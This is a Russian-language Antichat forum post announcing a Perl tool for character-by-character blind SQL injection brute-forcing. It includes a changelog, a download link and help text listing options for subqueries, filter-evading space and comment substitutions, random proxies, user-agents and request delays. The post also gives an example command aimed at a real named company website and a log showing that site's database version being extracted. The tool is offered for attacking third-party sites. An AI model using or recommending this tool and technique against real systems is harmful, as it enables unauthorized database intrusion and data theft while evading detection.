Форум АНТИЧАТ - Показать сообщение отдельно

Antichat SQL-tools for one_simvol_brut_columns v.1.1.1
Скрипт для посимвольного перебора записей в БД.

Основная функция:
- посимвольный подбор целевого значения записи в БД

Обращаю ваше внимание, что консольная и GUI одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение положительного ответа, длинны целевой записи
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - произведено разделение потока вывода в лог и консоль.
(Это сделано для того, чтобы при посимвольном бруте файла через load_file() информационный мусор не попадал в лог)
- пресеты ascii - на выбор
- новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода. улучшение алгоритмов перебора для минимального кол-ва запросов.
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
v1.0.7(30.09.2006) - фикс: исправил критическую ошибку в модуле определения длинны.
(Обозвал функцию "lenght" вместо "length". Да, бывает. Сорри.)
v1.0.6(17.07.2006) - новое: улучшил алгоритм перебора - экономия трафика
v1.0.5(31.08.2006) - новое: авто-определение длины перебираемой записи
- новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: добавил getopts. Теперь удобно указывать параметры
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: защита от дурака + хелп
- новое: возможность указать начальную и конечную позицию записи
v1.0.1 - новое: автоматический брут всей записи (ранее подбирал только указанный символ)
v1.0.0(19.06.2006) - Раскопал скрипт от rst(r57sql_ocb.pl). Появилось желание доработать.

Скачать: http://sec-123.narod.ru/public/sql_ocb_public.rar

Выдержка из хелпа:

Код:

   Options:
 -u - путь к сайту с уязвимым скриптом
 -s - подзапрос к бд. Например, "version()" или "(select user from mysql.user)"
 -a - строка, присутствующая в ответе, если условие 1=1 и отсутствует, когда 1=2 ; При указании "AUTO" будет определена самостоятельно
 -m - наборы символов ascii: 0-все, 1-мд5, 2-цифры, 3-англ.буквы, 4-рус.буквы
 -L - автоопределение длинны строки. Удобно при бруте строк рэндомных длинн. 
     0-выход при первой ошибке(рекомендую все ascii, тогда выход при конце строки)
     1-задаём нужную длинну строки через n и N. Все не найденные ascii обозначаться "*"
     2-включаем автоопределение длинны строки. Все не найденные ascii обозначаться "*"
 -n - (только для L=1)позиция первого символа в строке, с которого начнём брут
 -N - (только для L=1)позиция последнего символа в строке, на котором закончим брут
 -S - вид пробела: "%20","+","%2B","/**/","%09","%0D","$IFS" 
 -c - вид коментов: "/*","--","#"
 -g - работа через гет или пост-запросы
 -t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10
 -b - юзер-агент. выбирается случайный юзер-агент при каждом запросе
 -p - файл с проксями. выбирается случайная прокся при каждом запросе
 -l - логирование(лог адаптирован под брут файлов: фразы типа "-> Try 48 .." не пишутся - только сам результат )

Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! В GUI версии используется кодировка "use encoding 'cp1251';". Она была подключена ради поддержки русского gui-хелпа.
При использовании посимвольного брута Вы можете иметь проблемы с неподбираемыми русскими буквами, поскольку ascii-коды в скрипте будут в cp1251, а на сервере в utf-8.
Для устранения глюка просто закоментруйте подключенную кодировку: "# use encoding 'cp1251';"

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Внимание! Выяснена особенность перла, имеющая неприятные последствия.
При глубине вложения процедур более одной, вывод текста в консоль происходит, если выполняется хотя бы одно условие:
- выход из процедуры в тело самой первой процедуры или основной программы;
- использование при выводе символа переноса строки: "\n"
Поскольку структура моих скриптов имеет высокую степень вложений при выполнении, и иногда требуется не выполнять перенос строки, то вывод данных в консоль может быть задержан.
В любом случае в лог-файл данные попадают БЕЗ задержек, поэтому даже если вы кикнули якобы подвисший скрипт - проверьте лог-файл.
Как пример - при посимвольном бруте содержимого файла вывод в консоль будет осуществляться только при переходе на следующую строку в файле, НО в лог-файл будет записан каждый символ.

Протестить на сайте:

Код:

C:\sql_ocb.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"

Лог работы:

Код:

=====_Sql-Databases One Char Bruteforce Tool_=====

*URL:__________http://www.comstar.ru/press-center/news/?month=10&year=2004 
 substring():__version() 
 Answer_true:__AUTO 
 Ascii:________all
 Lenght:_______first-error 
 Min_num:______1 
 Max_num:______10 
 SPACE:________%20 
 Comment:______/* 
 POST-GET:_____GET 
 Time(sleep):__0 
 User-Agent:___useragent.txt 
 PROXY:________proxy.txt 
 Log:__________log_ocb.txt 

=====_Sql-Databases One Char Bruteforce Tool_=====

GO!

 Auto-Detect Answer. Please, WAIT...

 OK! Answer: Dial

 Brut string "version()":

4.1.1-alpha-standard-log

-----------------------------------
 Result brut(char): 4.1.1-alpha-standard-log
 Result brut(ascii): 52,46,49,46,49,45,97,108,112,104,97,45,115,116,97,110,100,97,114,100,45,108,111,103,


      Work finished! EXIT.